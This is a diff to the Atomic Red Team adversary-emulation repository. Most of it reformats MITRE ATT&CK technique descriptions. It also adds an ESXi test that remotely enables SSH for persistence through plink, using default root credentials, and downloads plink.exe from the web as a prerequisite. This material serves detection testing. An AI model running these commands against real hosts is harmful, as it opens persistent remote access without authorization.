 # T1021.001 - Remote Services: Remote Desktop Protocol
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1021/001)
-<blockquote>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
+<blockquote>
+
+Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
 
 Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services) 
 
-Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the [Accessibility Features](https://attack.mitre.org/techniques/T1546/008) or [Terminal Services DLL](https://attack.mitre.org/techniques/T1505/005) for Persistence.(Citation: Alperovitch Malware)</blockquote>
+Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the [Accessibility Features](https://attack.mitre.org/techniques/T1546/008) or [Terminal Services DLL](https://attack.mitre.org/techniques/T1505/005) for Persistence.(Citation: Alperovitch Malware)
+
+</blockquote>
 
 ## Atomic Tests
 

atomics/T1021.002/T1021.002.md

@@ -1,10 +1,14 @@
 # T1021.002 - Remote Services: SMB/Windows Admin Shares
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1021/002)
-<blockquote>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.
+<blockquote>
+
+Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.
 
 SMB is a file, printer, and serial port sharing protocol for Windows machines on the same network or domain. Adversaries may use SMB to interact with file shares, allowing them to move laterally throughout a network. Linux and macOS implementations of SMB typically use Samba.
 
-Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include `C$`, `ADMIN$`, and `IPC$`. Adversaries may use this technique in conjunction with administrator-level [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely access a networked system over SMB,(Citation: Wikipedia Server Message Block) to interact with systems using remote procedure calls (RPCs),(Citation: TechNet RPC) transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Service Execution](https://attack.mitre.org/techniques/T1569/002), and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). Adversaries can also use NTLM hashes to access administrator shares on systems with [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) and certain configuration and patch levels.(Citation: Microsoft Admin Shares)</blockquote>
+Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include `C$`, `ADMIN$`, and `IPC$`. Adversaries may use this technique in conjunction with administrator-level [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely access a networked system over SMB,(Citation: Wikipedia Server Message Block) to interact with systems using remote procedure calls (RPCs),(Citation: TechNet RPC) transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Service Execution](https://attack.mitre.org/techniques/T1569/002), and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). Adversaries can also use NTLM hashes to access administrator shares on systems with [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) and certain configuration and patch levels.(Citation: Microsoft Admin Shares)
+
+</blockquote>
 
 ## Atomic Tests
 

atomics/T1021.003/T1021.003.md

@@ -1,12 +1,16 @@
 # T1021.003 - Remote Services: Distributed Component Object Model
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1021/003)
-<blockquote>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote machines by taking advantage of Distributed Component Object Model (DCOM). The adversary may then perform actions as the logged-on user.
+<blockquote>
+
+Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote machines by taking advantage of Distributed Component Object Model (DCOM). The adversary may then perform actions as the logged-on user.
 
 The Windows Component Object Model (COM) is a component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces. Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE). Distributed COM (DCOM) is transparent middleware that extends the functionality of COM beyond a local computer using remote procedure call (RPC) technology.(Citation: Fireeye Hunting COM June 2019)(Citation: Microsoft COM)
 
 Permissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry.(Citation: Microsoft Process Wide Com Keys) By default, only Administrators may remotely activate and launch COM objects through DCOM.(Citation: Microsoft COM ACL)
 
-Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) as well as other Windows objects that contain insecure methods.(Citation: Enigma MMC20 COM Jan 2017)(Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM can also execute macros in existing documents(Citation: Enigma Excel DCOM Sept 2017) and may also invoke [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) (DDE) execution directly through a COM created instance of a Microsoft Office application(Citation: Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing the need for a malicious document. DCOM can be used as a method of remotely interacting with [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). (Citation: MSDN WMI)</blockquote>
+Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) as well as other Windows objects that contain insecure methods.(Citation: Enigma MMC20 COM Jan 2017)(Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM can also execute macros in existing documents(Citation: Enigma Excel DCOM Sept 2017) and may also invoke [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) (DDE) execution directly through a COM created instance of a Microsoft Office application(Citation: Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing the need for a malicious document. DCOM can be used as a method of remotely interacting with [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). (Citation: MSDN WMI)
+
+</blockquote>
 
 ## Atomic Tests
 

atomics/T1021.004/T1021.004.md

@@ -1,20 +1,26 @@
 # T1021.004 - Remote Services: SSH
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1021/004)
-<blockquote>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user.
+<blockquote>
 
-SSH is a protocol that allows authorized users to open remote shells on other computers. Many Linux and macOS versions come with SSH installed by default, although typically disabled until the user enables it. The SSH server can be configured to use standard password authentication or public-private keypairs in lieu of or in addition to a password. In this authentication scenario, the user’s public key must be in a special file on the computer running the server that lists which keypairs are allowed to login as that user.</blockquote>
+Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user.
+
+SSH is a protocol that allows authorized users to open remote shells on other computers. Many Linux and macOS versions come with SSH installed by default, although typically disabled until the user enables it. The SSH server can be configured to use standard password authentication or public-private keypairs in lieu of or in addition to a password. In this authentication scenario, the user’s public key must be in a special file on the computer running the server that lists which keypairs are allowed to login as that user.
+
+</blockquote>
 
 ## Atomic Tests
 
 - [Atomic Test #1 - ESXi - Enable SSH via PowerCLI](#atomic-test-1---esxi---enable-ssh-via-powercli)
 
+- [Atomic Test #2 - ESXi - Enable SSH via VIM-CMD](#atomic-test-2---esxi---enable-ssh-via-vim-cmd)
+
 
 <br/>
 
 ## Atomic Test #1 - ESXi - Enable SSH via PowerCLI
 An adversary enables the SSH service on a ESXi host to maintain persistent access to the host and to carryout subsequent operations.
 
-**Supported Platforms:** Linux
+**Supported Platforms:** Windows
 
 
 **auto_generated_guid:** 8f6c14d1-f13d-4616-b7fc-98cc69fe56ec
@@ -64,4 +70,58 @@ Install-Module -Name VMware.PowerCLI
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #2 - ESXi - Enable SSH via VIM-CMD
+An adversary enables SSH on an ESXi host to maintain persistence and creeate another command execution interface.
+[Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#enable%20service)
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 280812c8-4dae-43e9-a74e-1d08ab997c0e
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| vm_host | Specify the host name or IP of the ESXi server. | string | atomic.local|
+| vm_user | Specify the privilege user account on the ESXi server. | string | root|
+| vm_pass | Specify the privileged user's password. | string | password|
+| plink_file | Path to Plink | path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;plink.exe|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
+```
+
+#### Cleanup Commands:
+```cmd
+echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/disable_ssh"
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Check if we have plink
+##### Check Prereq Commands:
+```powershell
+if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+```
+
+
+
+
 <br/>

atomics/T1021.004/T1021.004.yaml

@@ -6,7 +6,7 @@ atomic_tests:
   description: |
     An adversary enables the SSH service on a ESXi host to maintain persistent access to the host and to carryout subsequent operations.
   supported_platforms:
-  - linux
+  - windows
   input_arguments:
     vm_host:
       description: Specify the host name of the ESXi Server
@@ -40,4 +40,44 @@ atomic_tests:
       Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
       Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Stop-VMHostService -Confirm:$false
     name: powershell
-    elevation_required: true
+    elevation_required: true
+- name: ESXi - Enable SSH via VIM-CMD
+  auto_generated_guid: 280812c8-4dae-43e9-a74e-1d08ab997c0e
+  description: |
+    An adversary enables SSH on an ESXi host to maintain persistence and creeate another command execution interface.
+    [Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#enable%20service)
+  supported_platforms:
+  - windows
+  input_arguments:
+    vm_host:
+      description: Specify the host name or IP of the ESXi server.
+      type: string
+      default: atomic.local
+    vm_user:
+      description: Specify the privilege user account on the ESXi server.
+      type: string
+      default: root
+    vm_pass:
+      description: Specify the privileged user's password.
+      type: string
+      default: password
+    plink_file:
+      description: Path to Plink
+      type: path
+      default: 'PathToAtomicsFolder\..\ExternalPayloads\plink.exe'
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Check if we have plink
+    prereq_command: |
+      if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+    get_prereq_command: |
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+  executor:
+    command: |
+      echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
+    cleanup_command: |
+      echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/disable_ssh"
+    name: command_prompt
+    elevation_required: false

atomics/T1021.005/T1021.005.md

@@ -1,10 +1,14 @@
 # T1021.005 - Remote Services:VNC
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1021/005)
-<blockquote>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC).  VNC is a platform-independent desktop sharing system that uses the RFB (“remote framebuffer”) protocol to enable users to remotely control another computer’s display by relaying the screen, mouse, and keyboard inputs over the network.(Citation: The Remote Framebuffer Protocol)
+<blockquote>
+
+Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC).  VNC is a platform-independent desktop sharing system that uses the RFB (“remote framebuffer”) protocol to enable users to remotely control another computer’s display by relaying the screen, mouse, and keyboard inputs over the network.(Citation: The Remote Framebuffer Protocol)
 
 VNC differs from [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) as VNC is screen-sharing software rather than resource-sharing software. By default, VNC uses the system's authentication, but it can be configured to use credentials specific to VNC.(Citation: MacOS VNC software for Remote Desktop)(Citation: VNC Authentication)
 
-Adversaries may abuse VNC to perform malicious actions as the logged-on user such as opening documents, downloading files, and running arbitrary commands. An adversary could use VNC to remotely control and monitor a system to collect data and information to pivot to other systems within the network. Specific VNC libraries/implementations have also been susceptible to brute force attacks and memory usage exploitation.(Citation: Hijacking VNC)(Citation: macOS root VNC login without authentication)(Citation: VNC Vulnerabilities)(Citation: Offensive Security VNC Authentication Check)(Citation: Attacking VNC Servers PentestLab)(Citation: Havana authentication bug)</blockquote>
+Adversaries may abuse VNC to perform malicious actions as the logged-on user such as opening documents, downloading files, and running arbitrary commands. An adversary could use VNC to remotely control and monitor a system to collect data and information to pivot to other systems within the network. Specific VNC libraries/implementations have also been susceptible to brute force attacks and memory usage exploitation.(Citation: Hijacking VNC)(Citation: macOS root VNC login without authentication)(Citation: VNC Vulnerabilities)(Citation: Offensive Security VNC Authentication Check)(Citation: Attacking VNC Servers PentestLab)(Citation: Havana authentication bug)
+
+</blockquote>
 
 ## Atomic Tests
 

atomics/T1021.006/T1021.006.md

@@ -1,8 +1,12 @@
 # T1021.006 - Remote Services: Windows Remote Management
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1021/006)
-<blockquote>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.
+<blockquote>
 
-WinRM is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).(Citation: Microsoft WinRM) It may be called with the `winrm` command or by any number of programs such as PowerShell.(Citation: Jacobsen 2014) WinRM  can be used as a method of remotely interacting with [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).(Citation: MSDN WMI)</blockquote>
+Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.
+
+WinRM is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).(Citation: Microsoft WinRM) It may be called with the `winrm` command or by any number of programs such as PowerShell.(Citation: Jacobsen 2014) WinRM  can be used as a method of remotely interacting with [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).(Citation: MSDN WMI)
+
+</blockquote>
 
 ## Atomic Tests
 

atomics/T1025/T1025.md

@@ -1,8 +1,12 @@
 # T1025 - Data from Removable Media
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1025)
-<blockquote>Adversaries may search connected removable media on computers they have compromised to find files of interest. Sensitive data can be collected from any removable media (optical disk drive, USB memory, etc.) connected to the compromised system prior to Exfiltration. Interactive command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather information. 
+<blockquote>
 
-Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on removable media.</blockquote>
+Adversaries may search connected removable media on computers they have compromised to find files of interest. Sensitive data can be collected from any removable media (optical disk drive, USB memory, etc.) connected to the compromised system prior to Exfiltration. Interactive command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather information. 
+
+Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on removable media.
+
+</blockquote>
 
 ## Atomic Tests
 

atomics/T1027.001/T1027.001.md

@@ -1,8 +1,12 @@
 # T1027.001 - Obfuscated Files or Information: Binary Padding
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1027/001)
-<blockquote>Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This can be done without affecting the functionality or behavior of a binary, but can increase the size of the binary beyond what some security tools are capable of handling due to file size limitations. 
+<blockquote>
 
-Binary padding effectively changes the checksum of the file and can also be used to avoid hash-based blocklists and static anti-virus signatures.(Citation: ESET OceanLotus) The padding used is commonly generated by a function to create junk data and then appended to the end or applied to sections of malware.(Citation: Securelist Malware Tricks April 2017) Increasing the file size may decrease the effectiveness of certain tools and detection capabilities that are not designed or configured to scan large files. This may also reduce the likelihood of being collected for analysis. Public file scanning services, such as VirusTotal, limits the maximum size of an uploaded file to be analyzed.(Citation: VirusTotal FAQ) </blockquote>
+Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This can be done without affecting the functionality or behavior of a binary, but can increase the size of the binary beyond what some security tools are capable of handling due to file size limitations. 
+
+Binary padding effectively changes the checksum of the file and can also be used to avoid hash-based blocklists and static anti-virus signatures.(Citation: ESET OceanLotus) The padding used is commonly generated by a function to create junk data and then appended to the end or applied to sections of malware.(Citation: Securelist Malware Tricks April 2017) Increasing the file size may decrease the effectiveness of certain tools and detection capabilities that are not designed or configured to scan large files. This may also reduce the likelihood of being collected for analysis. Public file scanning services, such as VirusTotal, limits the maximum size of an uploaded file to be analyzed.(Citation: VirusTotal FAQ) 
+
+</blockquote>
 
 ## Atomic Tests
 

atomics/T1027.002/T1027.002.md

@@ -1,8 +1,12 @@
 # T1027.002 - Obfuscated Files or Information: Software Packing
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1027/002)
-<blockquote>Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.(Citation: ESET FinFisher Jan 2018) 
+<blockquote>
 
-Utilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.(Citation: Awesome Executable Packing)  </blockquote>
+Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.(Citation: ESET FinFisher Jan 2018) 
+
+Utilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.(Citation: Awesome Executable Packing)  
+
+</blockquote>
 
 ## Atomic Tests
 

atomics/T1027.004/T1027.004.md

@@ -1,8 +1,12 @@
 # T1027.004 - Obfuscated Files or Information: Compile After Delivery
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1027/004)
-<blockquote>Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as ilasm.exe(Citation: ATTACK IQ), csc.exe, or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
+<blockquote>
 
-Source code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)</blockquote>
+Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as ilasm.exe(Citation: ATTACK IQ), csc.exe, or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
+
+Source code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)
+
+</blockquote>
 
 ## Atomic Tests
 

atomics/T1027.006/T1027.006.md

@@ -1,10 +1,14 @@
 # T1027.006 - HTML Smuggling
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1027/006)
-<blockquote>Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. HTML documents can store large binary objects known as JavaScript Blobs (immutable data that represents raw bytes) that can later be constructed into file-like objects. Data may also be stored in Data URLs, which enable embedding media type or MIME files inline of HTML documents. HTML5 also introduced a download attribute that may be used to initiate file downloads.(Citation: HTML Smuggling Menlo Security 2020)(Citation: Outlflank HTML Smuggling 2018)
+<blockquote>
+
+Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. HTML documents can store large binary objects known as JavaScript Blobs (immutable data that represents raw bytes) that can later be constructed into file-like objects. Data may also be stored in Data URLs, which enable embedding media type or MIME files inline of HTML documents. HTML5 also introduced a download attribute that may be used to initiate file downloads.(Citation: HTML Smuggling Menlo Security 2020)(Citation: Outlflank HTML Smuggling 2018)
 
 Adversaries may deliver payloads to victims that bypass security controls through HTML Smuggling by abusing JavaScript Blobs and/or HTML5 download attributes. Security controls such as web content filters may not identify smuggled malicious files inside of HTML/JS files, as the content may be based on typically benign MIME types such as <code>text/plain</code> and/or <code>text/html</code>. Malicious files or data can be obfuscated and hidden inside of HTML files through Data URLs and/or JavaScript Blobs and can be deobfuscated when they reach the victim (i.e. [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140)), potentially bypassing content filters.
 
-For example, JavaScript Blobs can be abused to dynamically generate malicious files in the victim machine and may be dropped to disk by abusing JavaScript functions such as <code>msSaveBlob</code>.(Citation: HTML Smuggling Menlo Security 2020)(Citation: MSTIC NOBELIUM May 2021)(Citation: Outlflank HTML Smuggling 2018)(Citation: nccgroup Smuggling HTA 2017)</blockquote>
+For example, JavaScript Blobs can be abused to dynamically generate malicious files in the victim machine and may be dropped to disk by abusing JavaScript functions such as <code>msSaveBlob</code>.(Citation: HTML Smuggling Menlo Security 2020)(Citation: MSTIC NOBELIUM May 2021)(Citation: Outlflank HTML Smuggling 2018)(Citation: nccgroup Smuggling HTA 2017)
+
+</blockquote>
 
 ## Atomic Tests
 

atomics/T1027.007/T1027.007.md

@@ -1,12 +1,16 @@
 # T1027.007 - Obfuscated Files or Information: Dynamic API Resolution
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1027/007)
-<blockquote>Adversaries may obfuscate then dynamically resolve API functions called by their malware in order to conceal malicious functionalities and impair defensive analysis. Malware commonly uses various [Native API](https://attack.mitre.org/techniques/T1106) functions provided by the OS to perform various tasks such as those involving processes, files, and other system artifacts.
+<blockquote>
+
+Adversaries may obfuscate then dynamically resolve API functions called by their malware in order to conceal malicious functionalities and impair defensive analysis. Malware commonly uses various [Native API](https://attack.mitre.org/techniques/T1106) functions provided by the OS to perform various tasks such as those involving processes, files, and other system artifacts.
 
 API functions called by malware may leave static artifacts such as strings in payload files. Defensive analysts may also uncover which functions a binary file may execute via an import address table (IAT) or other structures that help dynamically link calling code to the shared modules that provide functions.(Citation: Huntress API Hash)(Citation: IRED API Hashing)
 
 To avoid static or other defensive analysis, adversaries may use dynamic API resolution to conceal malware characteristics and functionalities. Similar to [Software Packing](https://attack.mitre.org/techniques/T1027/002), dynamic API resolution may change file signatures and obfuscate malicious API function calls until they are resolved and invoked during runtime.
 
-Various methods may be used to obfuscate malware calls to API functions. For example, hashes of function names are commonly stored in malware in lieu of literal strings. Malware can use these hashes (or other identifiers) to manually reproduce the linking and loading process using functions such as `GetProcAddress()` and `LoadLibrary()`. These hashes/identifiers can also be further obfuscated using encryption or other string manipulation tricks (requiring various forms of [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) during execution).(Citation: BlackHat API Packers)(Citation: Drakonia HInvoke)(Citation: Huntress API Hash)</blockquote>
+Various methods may be used to obfuscate malware calls to API functions. For example, hashes of function names are commonly stored in malware in lieu of literal strings. Malware can use these hashes (or other identifiers) to manually reproduce the linking and loading process using functions such as `GetProcAddress()` and `LoadLibrary()`. These hashes/identifiers can also be further obfuscated using encryption or other string manipulation tricks (requiring various forms of [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) during execution).(Citation: BlackHat API Packers)(Citation: Drakonia HInvoke)(Citation: Huntress API Hash)
+
+</blockquote>
 
 ## Atomic Tests
 

atomics/T1027/T1027.md

@@ -1,12 +1,16 @@
 # T1027 - Obfuscated Files or Information
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1027)
-<blockquote>Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. 
+<blockquote>
+
+Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. 
 
 Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) for [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also use compressed or archived scripts, such as JavaScript. 
 
 Portions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016)
 
-Adversaries may also abuse [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010) to obscure commands executed from payloads or directly via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017) </blockquote>
+Adversaries may also abuse [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010) to obscure commands executed from payloads or directly via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017) 
+
+</blockquote>
 
 ## Atomic Tests
 

atomics/T1030/T1030.md

@@ -1,6 +1,10 @@
 # T1030 - Data Transfer Size Limits
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1030)
-<blockquote>An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.</blockquote>
+<blockquote>
+
+An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.
+
+</blockquote>
 
 ## Atomic Tests
 

atomics/T1033/T1033.md

@@ -1,10 +1,14 @@
 # T1033 - System Owner/User Discovery
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1033)
-<blockquote>Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
+<blockquote>
+
+Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
 
 Various utilities and commands may acquire this information, including <code>whoami</code>. In macOS and Linux, the currently logged in user can be identified with <code>w</code> and <code>who</code>. On macOS the <code>dscl . list /Users | grep -v '_'</code> command can also be used to enumerate user accounts. Environment variables, such as <code>%USERNAME%</code> and <code>$USER</code>, may also be used to access this information.
 
-On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show users` and `show ssh` can be used to display users currently logged into the device.(Citation: show_ssh_users_cmd_cisco)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)</blockquote>
